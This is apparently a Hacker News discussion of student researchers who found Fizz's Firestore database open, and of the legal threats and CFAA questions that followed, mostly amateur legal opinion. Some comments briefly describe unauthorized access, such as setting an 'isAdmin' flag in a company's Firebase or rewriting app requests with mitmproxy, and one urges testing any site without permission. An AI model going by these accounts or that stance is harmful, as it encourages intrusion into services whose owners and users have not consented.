I'm not a lawyer, but I am professionally interested in this weird branch of the law, and it seems like EFF's staff attorney went a bit out on a limb here:
* Fizz appears to be a client/server application (presumably a web app?)
* The testing the researchers did was of software running on Fizz's servers
* After identifying a vulnerability, the researchers created administrator accounts using the database activity they obtained
* The researchers were not given permission to do this testing
If that fact pattern holds, then unless there's a California law governing this that I'm not aware of --- and even then, federal supremacy moots it, right? --- I think they did straightforwardly violate the CFAA, contra the claim in their response.
At least three things mitigate their legal risk:
1. It's very clear from their disclosure and behavior after disclosing that they were in good faith conducting security research, making them an unattractive target for prosecution.
2. It's not clear that they did any meaningful damage (this is subtle: you can easily rack up 5-6 figure damage numbers from unauthorized security research, but Fizz was so small and new that I'm assuming nobody even contemplating retaining a forensics firm or truing things up with their insurers, who probably did not exist), meaning there wouldn't have been much to prosecute.
3. Fizz's lawyers fucked up and threatened a criminal prosecution in order to obtain a valuable concession fro the researchers, which, as EFF points out, violates a state bar rule.
I think the good guys prevailed here, but I'm wary of taking too many lessons from this; if this hadn't been "Fizz", but rather the social media features of Dunder Mifflin Infinity, the outcome might have been gnarlier.
A friend points out that the limb EFF was out on was sturdy indeed, since DOJ has issued a policy statement saying they're not going after good-faith security research.
To me that reads less as "this is legal" and more as "this is illegal, but we (the executive branch of the government) will be nice and not go after you for it as long as we think you're a good guy". That's (arguably) better than nothing, but not exactly an ideal way to structure our justice system in my opinion.
So then you’d concede that all that’s left is these Fizzbuzz people are liars and are bad people, and that their product is crap and should not be used, and you don’t need to have personally used the app nor met them personally to know any of that, since it’s all clear from their extremely obnoxious, self destructive conduct, and that that’s just an opinion and not a forecast on whether or not their useless investors will get a return?
> this is subtle: you can easily rack up 5-6 figure damage numbers from unauthorized security research, but Fizz was so small and new that I'm assuming nobody even contemplating retaining a forensics firm or truing things up with their insurers, who probably did not exist
This seems like a problem with the existing law, if that's how it works.
It puts the amount of "damages" in the hands of the "victim" who can choose to spend arbitrary amounts of resources (trivial in the scope of a large bureaucracy but large in absolute amount), providing a perverse incentive to waste resources in order to vindictively trigger harsh penalties against an imperfect actor whose true transgression was to embarrass them.
And it improperly assigns the cost of such measures, even to the extent that they're legitimate, to the person who merely brought their attention to the need for them. If you've been operating a publicly available service with a serious vulnerability you still have to go through everything and evaluate the scope of the compromise regardless of whether or not this person did anything inappropriate, in case someone else did. The source of that cost was their own action in operating a vulnerable service -- they should still be incurring it even if they discovered the vulnerability themselves, but not before putting it in production.
The damages attributable to the accused should be limited to the damage they actually caused, for example by using access to obtain customer financial information and committing credit card fraud.
A forensics investigation is usually required by insurers. It's not an arbitrary amount of money, it's just an amount you're not happy with. I understand why you feel that way, but it's not the way the law works.
I presume that the "limb" the EFF attorney went on is basically what would've been disputed in a court of law. It's easily argued that if an app is so badly configured that just _following the Firebase protocol_ can give you write access to the database, you haven't actually circumvented any security measures, because _there weren't any to circumvent_.
It reminds me of the case where AT&T had their iPad data subscriber data just sitting there on an unlisted webpage. Don't remember which way it went, but I think the guy went out of his way there to get all the data he could get, which isn't the case here.
IANAL, but the law does not require you to "circumvent" anything[1].
Simply, anyone who "accesses a computer without authorization ... and thereby obtains ... information from any protected computer" is in violation of the CFAA.
If the researchers in question did not download any customer data, nor cause any "damages", I am not sure they are guilty of anything. BUT, if they had, "the victim had insufficient security measures" is not a valid defense. These researchers were not authorized to access this computer, regardless of whether they were technically able to obtain access.
Leaving your door unlocked does not give burglars permission to burgle you.
Not a lawyer ofc, but I would not expect that line of reasoning to hold up in court as I wouldn't expect "the door was unlocked, your honor" to excuse trespassing.
That's not how CFAA works. Under CFAA if there was anything to indicate that permission is required to access the system, then that's enough even if no actual security features were implemented.
Good analysis. I’m really confused why in the 2020s anybody thinks that unsolicited pentesting is a sane or welcome thing to do.
The OP doesn’t seem to have a “mea culpa” so I hope they learned this lesson even if the piece is more meme-worthy with a “can you believe what these guys tried to do?” tone.
While their intent seems good, they were pretty clearly breaking the law.
While what you say is true, I feel strongly that it shouldn't be. It is morally right to show if a product that is used by many fellow students is marketed as "100% secure"* is in fact very vulnerable.
If some less ethical hackers got a hold of that data, much worse things could have happened.
* that's the biggest red flag. A company saying 100% obviously has very little actual security expertise.
PS: I'm a big fan of Germany's https://www.ccc.de/en/ who have pulled many such hacks against some of the biggest tech companies.
A security researcher checking on Firestore permissions is basically the equivalent of an electrician walking into a grocery store and noticing sparking wires dangling and taped awkwardly, and imminent fire hazards that could result in catastrophic damages to people shopping at the store.
It is absolutely the right, and IMO, the duty, of security researchers to test every website, app, product and service that they use regularly to ensure the continued safety of the general public. This is too important of a field to have a "not my problem" attitude of just ignoring egregious security vulnerabilities so they can be exploited by criminals.
> I’m really confused why in the 2020s anybody thinks that unsolicited pentesting is a sane or welcome thing to do.
I was looking for a comment like this. You couldn't pay me enough to do this sort of thing in this day and age (unless working for a DoD or 3-letter agency contractor, which would have my back covered), nevermind to do it pro bono or bona fide or whatever it is that these guys had in mind (either way, it looks like they were not paid to do it).
This sort of action might still have been sort of ok-ish in the late '00s, maybe going into 2010, 2011, but when the Russian/Chinese/North Korean/Iranian cyber threats became real (plus the whole Snowden fiasco) then related laws began to change (both in the US and in Europe) and doing this sort of stuff with no-one to back you up for real (forget the EFF) meant that the one doing it would be asking for trouble in a big way.
What about due diligence? If you're about to send and store sensitive information with a service, a service that claims to be 100% secure.... shouldn't you have the right to verify that the security is up to snuff? These researchers weren't attempting to harm anybody. What's wrong with kicking the tires?
It’s both sane and welcome. the alternative to unsolicited testing is your app getting owned and your customer data being sold and you being sued into oblivion. unsolicited.
Your vulnerability doesn’t cease to exist because you don’t want people to look at it.
Good analysis. One important caveat is that, while this may technically have been a CFAA violation, it's almost certainly not one the Department of Justice would prosecute.
Last year, the department updated its CFAA charging policy to not pursue charges against people engaged in "good-faith security research." [1] The CFAA is famously over-broad, so a DOJ policy is nowhere near as good as amending the law to make the legality of security research even clearer. Also, this policy could change under a new administration, so it's still risky—just less risky than it was before they formalized this policy.
If that fact pattern holds, then unless there's a California law governing this that I'm not aware of --- and even then, federal supremacy moots it, right? --- I think they did straightforwardly violate the CFAA, contra the claim in their response.
I am extremely not a lawyer but the pattern of legal posturing I've observed is that some lawyer makes grand over-reaching statements, the opposing lawyer responds with their own grand over-reaching statements.
"My clients did not violate the CFAA" should logically be interpreted as "good fucking luck arguing that my good faith student security researcher clients violated the CFAA in court".
I don't think you have the pattern of facts correct (unless you have access to more information than what is in linked the Stanford Daily article).
> At the time, Fizz used Google’s Firestore database product to store data including user information and posts. Firestore can be configured to use a set of security rules in order to prevent users from accessing data they should not have access to. However, Fizz did not have the necessary security rules set up, making it possible for anyone to query the database directly and access a significant amount of sensitive user data.
> We found that phone numbers and/or email addresses for all users were fully accessible, and that posts and upvotes were directly linkable to this identifiable information. It was possible to identify the author of any post on the platform.
So AFAICT there is no indication they created any admin accounts to access the data. This is yet another example of an essentially publicly accessible database that holds what was supposed to be private information. This seems like a far less clear application of the CFAA than the pattern of facts you describe.
I think intent matters for actually securing an indictment and conviction, if for example they can prove that you exfiled their user data (this happened to Weev who noticed an ordinal ID in a URL and enumerated all possible URLs) they could actually get the feds to bust you. But you're right, if they're big enough they could try to come after your regardless at the risk of turning the security research community against them.
I'm not a lawyer, so I'm pretty sure what I'm about to say wouldn't hold up in a court of law, but if you claim your system is 100% secure, then someone hacks it, I think by definition your are allowed to be there and not subject to the CFAA. In a 100% secure system you can't get into anything you're not allowed to, so if you're accessing something, you by definition, are allowed to.
We all here no, there is no such thing as something 100% secure, but if you're gonna go making wild claim, you should have to stand by them.
To your point in #2: this can create a murky and risky situation for the party being reviewed. Particularly if you’re small and you are trying to land your first big client that asks questions like “have you previously been compromised?” then your answer now depends on the definition of compromised.
Even if you are engaged in legitimate security research, it is highly unethical and unprofessional to willfully exceed your engagement limits. You may not even know the full reasoning of why those limits are established.
I don't understand why in both contracts and legal communication (particularly threatening one), there is little to no consequence for the writing party to get things right.
I've seen examples of an employee contract, with things like "if any piece of this contract is invalid it doesn't invalidate the rest of the contract". The employer is basically trying to enforce their rules (reasonable), but they have no negative consequences if what they write is not allowed. At most a court deems that piece invalid, but that's it. The onus is on the reader to know (which tends to be a much weaker party).
Same here. Why can a company send a threatening letter ("you'll go 20 years to federal prison for this!!"), when it's clearly false? Shouldn't there be an onus on the writer to ensure that what they write is reasonable? And if it's absurdly and provably wrong, shouldn't there be some negative consequences more than "oh, nevermind"?
> I've seen examples of an employee contract, with things like "if any piece of this contract is invalid it doesn't invalidate the rest of the contract".
This concept of severability exists in basically all contracts, and is generally limited to sections that are not fundamental to the nature of the agreement. (The extent of what qualifies as fundamental is, as you said, up to a court to interpret.)
In your specific example of an employee contract, severability actually protects you too, by ensuring all the other covenants of your agreement - especially the ones that protect you as the individual - will remain in force even if a sub section is invalidated. Otherwise, if the whole contract were invalidated, you'd be starting from nothing (and likely out of a job). Some protections are better than zero.
> "if any piece of this contract is invalid it doesn't invalidate the rest of the contract".
Severability (the ability to "sever" part of a contract, leaving the remainder intact so long as it's not fundamentally a change to the contract's terms) comes from constitutional law and was intended to prevent wholesale overturning of previous precedent with each new case. It protects both parties from squirreling out of an entire legal obligation on a technicality, or writing poison pills into a contract you know won't stand up to legal scrutiny.
If part of the contract is invalidated, they can't leverage it. If that part being invalidated changes the contract fundamentally, the entire contract is voided. What more do you want?
It seems like you're arguing for some sort of punitive response to authoring a bad contract? That seems like a pretty awful idea re: chilling effect on all legal/business relationship formation, and wouldn't that likely impact the weaker parties worse as they have less access to high-powered legal authors? That means that even negotiating wording changes to a contract becomes a liability nightmare for the negotiators, doesn't that make the potential liability burden even more lopsided against small actors sitting across the table from entire legal teams?
I guess I'm having trouble seeing how the world you're imagining wouldn't end up introducing bigger risk for weaker parties than the world we're already in.
Practical example: your employment agreement has a non-compete clause. If 3 years later non-competes are no longer allowed in employment contracts, you won’t want to be suddenly unemployed because your employment contract is no longer valid.
You’ll want the originally negotiated contract, minus the clause that can’t be enforced.
Thanks for the explanation and the term "severability". I understand its point now and it makes sense to have it conceptually. I also didn't know about this part:
> so long as it's not fundamentally a change to the contract's terms
However, taken down one notch from theoretical to more practical:
> It seems like you're arguing for some sort of punitive response to authoring a bad contract?
Not quite so bluntly, but yes. There's obviously a gray area here. So not for mistakes, subtle technicalities. But if one party is being intentionally or absurdly overreaching then yes, I believe there should be some proportional punishment.
Particularly if the writing party's intent is to scare out of inaction more than a core belief that their wording is true.
The way I think of it is maybe in similar terms as disbarring or something like that. So not something that would be a day-to-day concern for honest people doing honest work, but some potential negative consequences if "you're taking it too far" (of course this last bit is completely handwavy).
Maybe such a mechanism exists that I'm not aware of.
There is obviously such a thing as going too far, but it's kind of hard to draw a clear line. In a good faith context, laws and precedents can change quickly, sometimes based on the whim of a judge, and there are many areas of law where there is no clear precedent or where guidance is fuzzy. In those cases, it's important to have severability so that entire contracts don't have to be renegotiated because one small clause didn't hold up in court.
Imagine an employment contract that contains a non-compete clause (ignore, for a moment, your personal beliefs about non-compete clauses). The company may have a single employment contract that they use everywhere, and so in states where non-competes are illegal, the severability clause allows them to avoid having separate contracts for each jurisdiction. And now suppose that a state that once allowed non-competes passes a law banning them: should every employment contract with a non-compete clause suddenly become null and void? Of course not. That's what severability is for.
In the case in the OP, it's hard to say what the context is of the threat, but I imagine something along the lines of, "Unauthorized access to our computer network is a federal crime under statute XYZ punishable by up to 20 years in prison." Scary as hell to a layperson, but it's not strictly speaking untrue, even if most lawyers would roll their eyes and say that they're full of shit. Sure, it's misleading, and a bad actor could easily take it too far, but it's hard to know exactly where to draw the line if lawyers couch a threat in enough qualifiers.
At the end of the day, documents like this are written by lawyers in legalese that's not designed for ordinary people. It's shitty that they threatened some college students with this, and whatever lawyer did write and send this letter on behalf of the company gave that company tremendously poor advice. I guess you could complain to the bar, but it would be very hard to make a compelling case in a situation like this.
(This is also one of the reasons why collective bargaining is so valuable. A union can afford legal representation to go toe to toe with the company's lawyers. Individual employees can't do that.)
It's a balance between encouraging people to stand up for their rights on one hand and discouraging filing of frivolous lawsuits on the other. The American system is "everyone pays their own legal fees", which encourages injured parties to file. The U.K. on the other hand is a "loser pays both parties' legal fees" (generally), which discourages a lot of plaintiffs from filing, even when they have been significantly harmed.
There can be consequences, but you have to be able to demonstrate you have been harmed. So, in what way have you been harmed by such a threat, and what is just compensation? How much will it cost to hire a lawyer to sue for compensation, and what are your chances of success? These are the same kinds of questions the entity sending the threatening letter asked themselves as well. If you think it is unfair because they have more resources, well that is more of a general societal problem - if you have more money you have access to better justice in all forms.
I recently got supremely frustrated by this in civil litigation. The claimant kept filing absolute fictional nonsense with no justification, and I had to run around trying to prove these things were not the case and racking up legal fees the whole time. apparently you can just say whatever you want.
That's not the language they use. It will be more like "your actions may violate (law ref) and if convicted, penalties may be up to 20 years in prison." And how do you keep people from saying that? It's basically a statement of fact. If you have a problem with this, then your issue is with Congress for writing such a vague law.
“[the security researchers] may be liable for fines, damages and each individual of the [security research] Group may be imprisoned… Criminal penalties under the CFAA can be up to 20 years depending on circumstances.”
“the Group’s actions are also a violation of Buzz’s Terms of Use and constitute a breach of contract, entitling Buzz to compensatory damages and damages for lost revenue.”
“the Group’s agreement to infiltrate Buzz’s network is also a separate offense of conspiracy, exposing the Group to even more significant criminal liability.”
Emphasis added. The language is quite a bit more forceful and threatening than you make it out to be. Given that they were issuing these threats as an ultimatum, a "keep quiet about this or else...", it was likely a violation of California State Bar's rules of professional conduct.
No, you are talking about criminal law. What OP is talking about is severability, which exists so that if a judge determines Clause X violates the law, they can still (attempt) to enforce the rest of the contract if X can be easily remedied. I.e. The contract says no lunch breaks but CalOSHA regulations say 30 minutes required, the contractor can't violate the contract in its' entirety, they just take the breaks and amend the contract if the employer pushes it.
I disagree with OP - a judge can always choose to invalidate a contract, regardless of severability. It is in there for the convenience of the parties, and I've not heard of it being used in bad faith.
"That's not the language they used. They simply admired your place of business and reflected on what a shame it would be if a negative event happened to it. How would you keep people from saying that? It's basically a statement of fact..."
Because contract law mostly views things through the lens of property rights. Historically those with the most property get the most rights, so they're able to get away with imposing wildly asymmetrical terms on the implicit basis that society will collapse if they're not allowed to.
These guys (at least according to the angry letter) went beyond reasonable safe harbor for security researchers. They created admin accounts and accessed data. Definitely not clearly false that there's no liability here. Probably actually true.
IANAL, but the letter is borderline extortion/blackmail. Threatening to report an illegal activity unless the alleged perpetrator does something to your advantage can be extortion/blackmail AFAIK.
I feel like this article reflects an overall positive change in the way disclosure is handled today. Back in the 90s this was the sort of thing every company did. Companies would threaten lawsuits, or disclosure in the first place seemed legally dubious. Discussions in forums / BBS's would be around if it was safe to disclose at all. Suggestions of anonymous email accounts and that sort of thing.
Sure you still get some of that today. An especially old fashioned company, or in this case naive college students but overall things have shifted quite dramatically in favor of disclosure. Dedicated middle men who protect security researcher's identities, Large enterprises encouraging and celebrating disclosure, six figure bug bounties, even the laws themselves have changed to be more friendly to security researchers.
I'm sure it was quite unpleasant to go through this for the author, but it's a nice reminder that situations like this are now somewhat rare as they used to be the norm (or worse).
The problem is that it is still entirely illegal to do this kind of hacking without any permission.
The fact that a lot of companies have embraced bug bounties and encourage this kind of stuff against them unfortunately teaches "kids" that this kind of thing is perfectly legal/moral/ethical/etc.
As this story shows though you're really rolling the dice, even though it worked out in this case.
> Discussions in forums / BBS's would be around if it was safe to disclose at all. Suggestions of anonymous email accounts and that sort of thing.
This is probably still a better idea if you don't have the cooperation of the target of the hack via some stated bug bounty program. But that doesn't help the security researcher "make a name" for themselves.
And you're basically admitting to the fact that you trespassed, even if all you did was the equivalent of walking through an unlocked door and verifying that you could look inside their refrigerator.
The fact that it may play out in the court of public opinion that you were helping to expose the lies of a corporation doesn't change the fact than in the actual courts you are guilty of a crime.
Yeah, when it comes to cyber-security, we put our national security at risk so companies can avoid being embarrassed. (See my rant in another comment.)
I wonder if this was the students' attempt to protect their future careers as much as anything—"keep quiet about this or else"—especially given the issues were quickly fixed. In that sense it differs from the classic 90s era retaliation. From the students' POV it was probably quite terrifying. I wouldn't discount intervention by wealthy parents either, but of course I know nothing of the situation or the people involved.
Crazy story. The Stanford daily article has copies of the lawyer letters back and forth, they are intense - and we wouldn't be able to read them if the EFF didn't step up.
The Stanford Daily article says “At the time, Fizz used Google’s Firestore database product to store data including user information and posts...Fizz did not have the necessary security rules set up, making it possible for anyone to query the database directly...phone numbers and/or email addresses for all users were fully accessible, and that posts and upvotes were directly linkable to this identifiable information....Moreover, the database was entirely editable — it was possible for anyone to edit posts, karma values, moderator status, and so on."
This is unfortunately a very common issue with Firebase apps. Since the client is writing directly to the database, usually authorization is forgotten and the client is trusted to only write to their own objects.
A long time ago I was able to get admin access to an electric scooter company by updating my Firebase user to have isAdmin set to true, and then I accidentally deleted the scooter I was renting from Firebase. I am not sure what happened to it after that.
One interesting thing about the statute of limitations is “the discovery rule.”
For example, say the statute of limitations for 18 USC 1030 is two years. If a person hypothetically stole a scooter by hacking, two years later, they would be in the clear, right?
No. The discovery rule says that if a damaged party, for good reason, does not immediately discover their loss, the statutes of limitations is paused until they do.
Accordingly, if the scooter company read a post today about a hack that happened “a long time ago” and therein discovered their loss, the statute of limitations would begin to tick today and the hacker could be in legal jeopardy for two more years.
It is common. But before you curse at Google here. This is VERY well documented. When you create a database the UI screams at you that it's in dev mode, that security has not been setup etc.... if you keep ignoring the database will eventually close itself down automatically.
Which is why I hate that people keep claiming that you don't need to know what you are doing nor employ anyone who knows what they are doing to setup infrastructure. You might be able to stand things up without knowing what you are doing, but you probably shouldn't be running it in production that way.
If I recall correctly, you can set your firebase rules such that a user can only read/write/delete certain collections based on conditions such as if
user.email == collection.email.
A few years ago I found that HelloTalk (a language learning pen-pal app) stored the actual GPS coordinates of users in a SQLite that you can find in your iOS backup. The maps in-app showed only a general location (pin disappeared at a certain zoom).
You could also bypass the filter preventing searching for over 18 if you are under/under if you are over, and paid-only filters like location, gender, etc. by rewriting the requests with a mitmproxy (paid status is not checked server-side).
Speaking of, are there tools to audit/explore firebase/firestore databases i.e. see if collections/documents are readable?
I imagine a web tool that could take the app id and other api values (that are publicly embedded in frontend apps), optionally support a session id (for those firestore apps that use a lightweight “only visible to logged in users” security rule) and accept names of collections (found in the js code) to explore?
Interestingly, Ashton Cofer and Teddy Solomon of Fizz tried some PR damage control when their wrongdoing came to light https://stanforddaily.com/2022/11/01/opinion-fizz-previously.... Their response was weak and it seems like they've refused to comment on the debacle since then.
Per the Stanford Daily article linked in the OP [0], they have also removed the statement addressing this incident and supposed improvements from their website.
>Although Fizz released a statement entitled “Security Improvements Regarding Fizz” on Dec. 7, 2021, the page is no longer navigable from Fizz’s website or Google searches as of the time of this article’s publication.
And, it seems likely the app still stores personally identifiable information about its "anonymous" users' activity.
> Moreover, we still don’t know whether our data is internally anonymized. The founders told The Daily last year that users are identifiable to developers. Fizz’s privacy policy implies that this is still the case
I suppose the 'developers' may include the same founders who have refused to comment on this, removed their company's communications about it, and originally leveraged legal threats over being caught marketing a completely leaky bucket as a "100% secure social media app." Can't say I'm in a hurry to put my information on Fizz.
Your sentiment is silly. In general, with important caveats I will not state here, you can of course voice a threat to do an action that is legal (file a lawsuit), and may not voice a threat to do an action that is illegal (physical assault).
I'm not even suggesting it has to happen at a legal level, but perhaps at a professional level, I would think any lawyer writing baseless threatening letters to people should be subject to losing there license.
IANL, but in some jurisdictions and circumstances I understand that threatening someone with criminal prosecution can itself constitute the crime of extortion or abuse of process.
2. at a higher level, threatening violence is a crime because the underlying act (committing violence) is also a crime. threatening to do a legal act is largely legal. it's not illegal to threaten reporting to the authorities, for instance.
Perfectly legal, but unethical. The motives are clear, they want to threaten/bully someone into silence who has information that could hurt their business. I don't think lawyers that engage in this behavior should be allowed to practice law, that's all.
> And at the end of their threat they had a demand: don’t ever talk about your findings publicly. Essentially, if you agree to silence, we won’t pursue legal action.
Legally, can this cover talking to e.g. state prosecutors and the police as well? Because claiming to be "100% secure", knowing you are not secure, and your users have no protection against spying from you or any minimally competent hacker, is fraud at minimum, but closer to criminal wiretapping, since you're knowingly tricking your users into revealing their secrets on your service, thinking they are "100% secure".
That this ended "amicably" is frankly a miscarriage of justice - the Fizz team should be facing fraud charges.
They could not have been ignorant of storing non-anonymous, plain-text messages. Even if we don't count that as insecure, they can only appeal to ignorance/negligence up until the point the security researchers informed them of their vulnerabilities.
After that, that they continued their "100% secure" marketing on one side, while threatening researchers into silence on the other, is plainly malicious.
I don't think the demands of Fizz have much legal standing.
We care more about corporations than citizens in the US. Advertising in the US is full of false claims. We ignore this because we pretend like words have no meaning.
* Fizz appears to be a client/server application (presumably a web app?)
* The testing the researchers did was of software running on Fizz's servers
* After identifying a vulnerability, the researchers created administrator accounts using the database activity they obtained
* The researchers were not given permission to do this testing
If that fact pattern holds, then unless there's a California law governing this that I'm not aware of --- and even then, federal supremacy moots it, right? --- I think they did straightforwardly violate the CFAA, contra the claim in their response.
At least three things mitigate their legal risk:
1. It's very clear from their disclosure and behavior after disclosing that they were in good faith conducting security research, making them an unattractive target for prosecution.
2. It's not clear that they did any meaningful damage (this is subtle: you can easily rack up 5-6 figure damage numbers from unauthorized security research, but Fizz was so small and new that I'm assuming nobody even contemplating retaining a forensics firm or truing things up with their insurers, who probably did not exist), meaning there wouldn't have been much to prosecute.
3. Fizz's lawyers fucked up and threatened a criminal prosecution in order to obtain a valuable concession fro the researchers, which, as EFF points out, violates a state bar rule.
I think the good guys prevailed here, but I'm wary of taking too many lessons from this; if this hadn't been "Fizz", but rather the social media features of Dunder Mifflin Infinity, the outcome might have been gnarlier.
https://www.justice.gov/opa/pr/department-justice-announces-...
This seems like a problem with the existing law, if that's how it works.
It puts the amount of "damages" in the hands of the "victim" who can choose to spend arbitrary amounts of resources (trivial in the scope of a large bureaucracy but large in absolute amount), providing a perverse incentive to waste resources in order to vindictively trigger harsh penalties against an imperfect actor whose true transgression was to embarrass them.
And it improperly assigns the cost of such measures, even to the extent that they're legitimate, to the person who merely brought their attention to the need for them. If you've been operating a publicly available service with a serious vulnerability you still have to go through everything and evaluate the scope of the compromise regardless of whether or not this person did anything inappropriate, in case someone else did. The source of that cost was their own action in operating a vulnerable service -- they should still be incurring it even if they discovered the vulnerability themselves, but not before putting it in production.
The damages attributable to the accused should be limited to the damage they actually caused, for example by using access to obtain customer financial information and committing credit card fraud.
Deleted Comment
It reminds me of the case where AT&T had their iPad data subscriber data just sitting there on an unlisted webpage. Don't remember which way it went, but I think the guy went out of his way there to get all the data he could get, which isn't the case here.
Simply, anyone who "accesses a computer without authorization ... and thereby obtains ... information from any protected computer" is in violation of the CFAA.
If the researchers in question did not download any customer data, nor cause any "damages", I am not sure they are guilty of anything. BUT, if they had, "the victim had insufficient security measures" is not a valid defense. These researchers were not authorized to access this computer, regardless of whether they were technically able to obtain access.
Leaving your door unlocked does not give burglars permission to burgle you.
[1] https://www.law.cornell.edu/uscode/text/18/1030
He ended up in prison.
(The conviction was later overturned on a jurisdictional detail, but I think he spent several months in federal prison.)
The OP doesn’t seem to have a “mea culpa” so I hope they learned this lesson even if the piece is more meme-worthy with a “can you believe what these guys tried to do?” tone.
While their intent seems good, they were pretty clearly breaking the law.
If some less ethical hackers got a hold of that data, much worse things could have happened.
* that's the biggest red flag. A company saying 100% obviously has very little actual security expertise.
PS: I'm a big fan of Germany's https://www.ccc.de/en/ who have pulled many such hacks against some of the biggest tech companies.
It is absolutely the right, and IMO, the duty, of security researchers to test every website, app, product and service that they use regularly to ensure the continued safety of the general public. This is too important of a field to have a "not my problem" attitude of just ignoring egregious security vulnerabilities so they can be exploited by criminals.
I was looking for a comment like this. You couldn't pay me enough to do this sort of thing in this day and age (unless working for a DoD or 3-letter agency contractor, which would have my back covered), nevermind to do it pro bono or bona fide or whatever it is that these guys had in mind (either way, it looks like they were not paid to do it).
This sort of action might still have been sort of ok-ish in the late '00s, maybe going into 2010, 2011, but when the Russian/Chinese/North Korean/Iranian cyber threats became real (plus the whole Snowden fiasco) then related laws began to change (both in the US and in Europe) and doing this sort of stuff with no-one to back you up for real (forget the EFF) meant that the one doing it would be asking for trouble in a big way.
The question isn't whether it should be done, but whether it should be done anonymously or openly.
TL;DR: it was good faith security research, and the US DoJ doesn't prosecute that.
Because bug bounties?
Last year, the department updated its CFAA charging policy to not pursue charges against people engaged in "good-faith security research." [1] The CFAA is famously over-broad, so a DOJ policy is nowhere near as good as amending the law to make the legality of security research even clearer. Also, this policy could change under a new administration, so it's still risky—just less risky than it was before they formalized this policy.
[1] https://www.justice.gov/opa/pr/department-justice-announces-...
"My clients did not violate the CFAA" should logically be interpreted as "good fucking luck arguing that my good faith student security researcher clients violated the CFAA in court".
Ignoring the legalities of it all, this step crosses a line morally imo.
> At the time, Fizz used Google’s Firestore database product to store data including user information and posts. Firestore can be configured to use a set of security rules in order to prevent users from accessing data they should not have access to. However, Fizz did not have the necessary security rules set up, making it possible for anyone to query the database directly and access a significant amount of sensitive user data.
> We found that phone numbers and/or email addresses for all users were fully accessible, and that posts and upvotes were directly linkable to this identifiable information. It was possible to identify the author of any post on the platform.
So AFAICT there is no indication they created any admin accounts to access the data. This is yet another example of an essentially publicly accessible database that holds what was supposed to be private information. This seems like a far less clear application of the CFAA than the pattern of facts you describe.
Really what happened is we checked whether we could set `isAdmin` to `true` on our existing accounts, and... we were able to. Adi's more technical writeup has details: https://saligrama.io/blog/post/firebase-insecure-by-default/
We all here no, there is no such thing as something 100% secure, but if you're gonna go making wild claim, you should have to stand by them.
Even if you are engaged in legitimate security research, it is highly unethical and unprofessional to willfully exceed your engagement limits. You may not even know the full reasoning of why those limits are established.
Fizz may have violated more than a state bar rule; this could very well be extortion (depending).
I would tend to agree with the balance of your comments.
Dead Comment
I've seen examples of an employee contract, with things like "if any piece of this contract is invalid it doesn't invalidate the rest of the contract". The employer is basically trying to enforce their rules (reasonable), but they have no negative consequences if what they write is not allowed. At most a court deems that piece invalid, but that's it. The onus is on the reader to know (which tends to be a much weaker party).
Same here. Why can a company send a threatening letter ("you'll go 20 years to federal prison for this!!"), when it's clearly false? Shouldn't there be an onus on the writer to ensure that what they write is reasonable? And if it's absurdly and provably wrong, shouldn't there be some negative consequences more than "oh, nevermind"?
This concept of severability exists in basically all contracts, and is generally limited to sections that are not fundamental to the nature of the agreement. (The extent of what qualifies as fundamental is, as you said, up to a court to interpret.)
In your specific example of an employee contract, severability actually protects you too, by ensuring all the other covenants of your agreement - especially the ones that protect you as the individual - will remain in force even if a sub section is invalidated. Otherwise, if the whole contract were invalidated, you'd be starting from nothing (and likely out of a job). Some protections are better than zero.
In a right-to-work state, what protections can an individual realistically expect to receive from a contract?
Severability (the ability to "sever" part of a contract, leaving the remainder intact so long as it's not fundamentally a change to the contract's terms) comes from constitutional law and was intended to prevent wholesale overturning of previous precedent with each new case. It protects both parties from squirreling out of an entire legal obligation on a technicality, or writing poison pills into a contract you know won't stand up to legal scrutiny.
If part of the contract is invalidated, they can't leverage it. If that part being invalidated changes the contract fundamentally, the entire contract is voided. What more do you want?
It seems like you're arguing for some sort of punitive response to authoring a bad contract? That seems like a pretty awful idea re: chilling effect on all legal/business relationship formation, and wouldn't that likely impact the weaker parties worse as they have less access to high-powered legal authors? That means that even negotiating wording changes to a contract becomes a liability nightmare for the negotiators, doesn't that make the potential liability burden even more lopsided against small actors sitting across the table from entire legal teams?
I guess I'm having trouble seeing how the world you're imagining wouldn't end up introducing bigger risk for weaker parties than the world we're already in.
You’ll want the originally negotiated contract, minus the clause that can’t be enforced.
However, taken down one notch from theoretical to more practical:
> It seems like you're arguing for some sort of punitive response to authoring a bad contract?
Not quite so bluntly, but yes. There's obviously a gray area here. So not for mistakes, subtle technicalities. But if one party is being intentionally or absurdly overreaching then yes, I believe there should be some proportional punishment. Particularly if the writing party's intent is to scare out of inaction more than a core belief that their wording is true.
The way I think of it is maybe in similar terms as disbarring or something like that. So not something that would be a day-to-day concern for honest people doing honest work, but some potential negative consequences if "you're taking it too far" (of course this last bit is completely handwavy).
Maybe such a mechanism exists that I'm not aware of.
Imagine an employment contract that contains a non-compete clause (ignore, for a moment, your personal beliefs about non-compete clauses). The company may have a single employment contract that they use everywhere, and so in states where non-competes are illegal, the severability clause allows them to avoid having separate contracts for each jurisdiction. And now suppose that a state that once allowed non-competes passes a law banning them: should every employment contract with a non-compete clause suddenly become null and void? Of course not. That's what severability is for.
In the case in the OP, it's hard to say what the context is of the threat, but I imagine something along the lines of, "Unauthorized access to our computer network is a federal crime under statute XYZ punishable by up to 20 years in prison." Scary as hell to a layperson, but it's not strictly speaking untrue, even if most lawyers would roll their eyes and say that they're full of shit. Sure, it's misleading, and a bad actor could easily take it too far, but it's hard to know exactly where to draw the line if lawyers couch a threat in enough qualifiers.
At the end of the day, documents like this are written by lawyers in legalese that's not designed for ordinary people. It's shitty that they threatened some college students with this, and whatever lawyer did write and send this letter on behalf of the company gave that company tremendously poor advice. I guess you could complain to the bar, but it would be very hard to make a compelling case in a situation like this.
(This is also one of the reasons why collective bargaining is so valuable. A union can afford legal representation to go toe to toe with the company's lawyers. Individual employees can't do that.)
Does it have to be this way?
“the Group’s actions are also a violation of Buzz’s Terms of Use and constitute a breach of contract, entitling Buzz to compensatory damages and damages for lost revenue.”
“the Group’s agreement to infiltrate Buzz’s network is also a separate offense of conspiracy, exposing the Group to even more significant criminal liability.”
Emphasis added. The language is quite a bit more forceful and threatening than you make it out to be. Given that they were issuing these threats as an ultimatum, a "keep quiet about this or else...", it was likely a violation of California State Bar's rules of professional conduct.
I disagree with OP - a judge can always choose to invalidate a contract, regardless of severability. It is in there for the convenience of the parties, and I've not heard of it being used in bad faith.
they threaten if they receive written confirmation that the researchers won't discuss the security issues they won't pursue charges.
The lawyers were very much not "for your information you could be liable for x if someone responded poorly", they were in fact responding poorly.
